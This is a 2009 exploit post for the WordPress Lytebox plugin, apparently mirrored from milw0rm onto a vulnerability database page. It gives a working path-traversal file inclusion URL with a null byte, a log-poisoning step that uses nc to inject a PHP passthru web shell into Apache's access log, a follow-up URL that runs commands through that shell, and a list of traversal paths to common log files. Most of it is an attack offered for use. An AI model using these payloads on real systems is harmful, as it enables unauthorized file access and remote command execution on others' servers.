WordPress Plugin Lytebox - 'wp-lytebox' Local File Inclusion

🗓️ 26 May 2009 00:00:00Reported by TurkGuvenligiType

WordPress Plugin Lytebox Local File Inclusion vulnerability, allows unauthorized access to local files and potential remote code executio

WP Plugin Lytebox Local File Ä°nclude and Remote Code Exe.

Download ; http://grupenet.com/wp-content/uploads/wp-lytebox.zip

Author : TurkGuvenligi

Site : www.turkguvenligi.info - [email protected]

Agd_Scorp - t4cs1zkr4L - TheHacker - Fatih - BLaSTeR

LFÄ°;

http://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../etc/profile%00

RCE;

open cmd (cmd aÃ§Ä±yoruz)

nc -vv 127.0.0.1 80 (connecting)
GET /<?php passthru(\$_GET[cmd]); ?> HTTP/1.0
Host : www.target.com

Our error is recorded and access_log :) yeah

http://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../var/log/apache2/access_log&cmd=[RCE]

access_log file ;


../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/error_log
../../../../../../../../../../var/log/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/access.log

good by. [www.turkguvenligi.info]

# milw0rm.com [2009-05-26]

26 May 2009 00:00Current

7High risk

Vulners AI Score7

WordPress Plugin Lytebox - &#039;wp-lytebox&#039; Local File Inclusion

WordPress Plugin Lytebox - 'wp-lytebox' Local File Inclusion